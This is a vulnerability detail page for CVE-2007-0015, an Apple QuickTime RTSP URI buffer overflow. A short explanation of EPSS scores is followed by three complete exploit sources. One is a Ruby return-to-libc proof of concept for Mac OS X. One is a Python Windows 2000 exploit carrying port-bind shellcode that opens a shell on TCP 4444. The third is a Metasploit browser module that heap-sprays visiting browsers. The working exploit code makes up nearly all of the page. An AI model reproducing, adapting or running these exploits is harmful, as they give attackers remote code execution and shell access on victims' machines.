CVE-2007-0015 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/ruby # Copyright (c) LMH <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # # Notes: # Our command string is loaded on memory at a static address normally, # but this depends on execution method and the string length. The address set in this exploit will # be likely successful if we open the resulting QTL file directly, without having an # instance of Quicktime running. Although, when using another method and string, you'll need # to find the address. # For 100% reliable exploitation you can always use the /bin/sh address, # but that's not as a cool as having your box welcoming the new year. # Do whatever you prefer. That said, enjoy. # # see http://projects.info-pull.com/moab/MOAB-01-01-2007.html # Command string: Use whatever you like. # Remember that changing this will also need a change of the target address for system(), # unless string length is the same. CMD_STRING = "/usr/bin/say Happy new year shit bag" # Mac OS X 10.4.8 (8L2127) EBP_ADDR = 0xdeadbabe SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back SETUID_ADDR = 0x900334f0 CURL_ADDR = 0x916c24bc # /usr/bin/curl SHELL_ADDR = 0x918bef3a # /bin/sh CMDSTR_ADDR = [ SHELL_ADDR, # 0 addr to static /bin/sh (lame) 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) 0xbabeface, # 2 bogus addr for testing. CURL_ADDR # 3 addr to '/usr/bin/curl' ] # Payload HAPPY = ("A" * 299) + [EBP_ADDR].pack("V") + [SYSTEM_ADDR].pack("V") + [SETUID_ADDR].pack("V") + [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr # Sleds: not necessary if using /bin/bash addr or other built-in addresses. # although, for using our own fu, we need to spray some data for better reliability # the goal is causing allocation of large heap chunks NEW = ("\x90" * 30000) + CMD_STRING # feed the heap YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more BOYZ = ("\x90" * 30000) + "FOOM" # and more # QTL output template QTL_CONTENT = "<?xml version=\"1.0\"?>" + "<?quicktime type=\"application/x-quicktime-media-link\"?>" + "<embed autoplay=\"true\" moviename=\"#{NEW}\" " + "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " + "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n" target_file = File.open("pwnage.qtl", "w+") { |f| f.print(QTL_CONTENT) f.close } # milw0rm.com [2007-01-01]

#!/usr/bin/python #Port bind exploit for apple quicktime rtsp vulnerability #Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy #to port the exploit to others. All one needs to do is look for the appropriate #jump address. Certain characters are not permitted in the shellcode. #Alphanumeric shellcodes work fine. #This script creates a qtl file which when clicked upon binds a shell to TCP #port 4444. This file can be delivered through several means; HTTP, SMTP etc # # Winny Thomas ;-) # Author shall bear no responsibility for any kind of screws up caused by using # this code import sys #alpha numeric port bind shellcode from metasploit; binds shell to port 4444 shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" shellcode += "\x4f\x4f\x42\x4d\x5a\x90" shellcode += "\x90" * 90 def CreateQTL(sp): if sp == "1": JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll elif sp == "2": JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll else: print 'Unsupported Service pack number' sys.exit(-1) #XML template from http://www.milw0rm.org/exploits/3064 QTL = "<?xml version=\"1.0\"?>" QTL += "<?quicktime type=\"application/x-quicktime-media-link\"?>" QTL += "<embed autoplay=\"true\" moviename=\"#{NEW}\" " QTL += "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " QTL += "src=\"rtsp://" + '\x90'*200 + shellcode + '\x90'*9000 + ':' + '\x90'*811 + JMPedi QTL += "\" />\n" fd = open('./exp.qtl', 'w') fd.write(QTL) fd.close() if __name__ == '__main__': try: sp = sys.argv[1] except IndexError: print 'Usage: %s <version number>\n' % sys.argv[0] print 'Version: 1 => windows 2000 server SP0' print 'Version: 2 => windows 2000 server SP4' sys.exit(-1) CreateQTL(sp) # milw0rm.com [2007-01-03]

## # $Id: apple_quicktime_rtsp.rb 9220 2010-05-04 23:09:32Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin. }, 'Author' => [ 'MC', 'egypt' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9220 $', 'References' => [ [ 'CVE', '2007-0015' ], [ 'OSVDB', '31023'], [ 'BID', '21829' ], [ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c", }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], [ 'Apple QuickTime Player 7.1.3', { 'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;) } ], [ 'Browser Universal', { 'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 1 2007', 'DefaultTarget' => 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) if (target.name =~ /Automatic/) if (request['User-Agent'] =~ /QuickTime/i) target = targets[1] else target = targets[2] end end cruft = rand_text_alphanumeric(4) # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. # Heap spray ftw. sploit = rand_text_english(307) sploit << p.encoded + "\xeb\x06" + rand_text_english(2) sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/) print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") print_status("Trying target #{target.name}...") content = build_qtl(sploit) else print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) url << ":" + datastore['SRVPORT'] url << get_resource js = <<-ENDJS #{js_heap_spray} sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000); ENDJS content = "<html><body><script><!--\n#{js}//--></script>" content << <<-ENDEMBED <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> <PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl"> <PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl"> <PARAM name="AUTOPLAY" VALUE = "true" > <PARAM name="TYPE" VALUE = "video/quicktime" > <PARAM name="TARGET" VALUE = "myself" > <EMBED SRC = "#{url}/#{cruft}.qtl" QTSRC = "#{url}/#{cruft}.qtl" TARGET = "myself" WIDTH = "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE = "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" > </EMBED> </OBJECT> ENDEMBED content << "</body></html>" end send_response(client, content, { 'Content-Type' => "text/html" }) # Handle the payload handler(client) end def build_qtl(overflow) cruft = rand_text_english(4) content = "<?xml version=\"1.0\"?>\n" content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n" content << "<embed autoplay=\"true\" \n" content << "moviename=\"#{cruft}\" \n" content << "qtnext=\"#{cruft}\" \n" content << "type=\"video/quicktime\" \n" content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" end end